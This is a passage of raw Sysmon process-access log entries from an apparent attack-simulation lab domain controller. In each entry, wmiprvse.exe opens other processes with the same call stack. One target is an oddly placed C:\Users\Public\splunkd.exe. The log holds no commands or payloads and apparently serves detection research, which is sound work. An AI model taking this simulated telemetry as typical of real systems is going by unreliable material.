Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025306Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025305Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025304Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025303Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025302Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025301Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025300Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025299Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.147{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025298Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.147{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025297Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.147{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025296Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.147{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025295Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.147{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025294Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.147{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025293Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.147{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025292Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.147{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025291Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.147{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025290Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.147{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025289Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.147{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025288Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.147{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025287Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 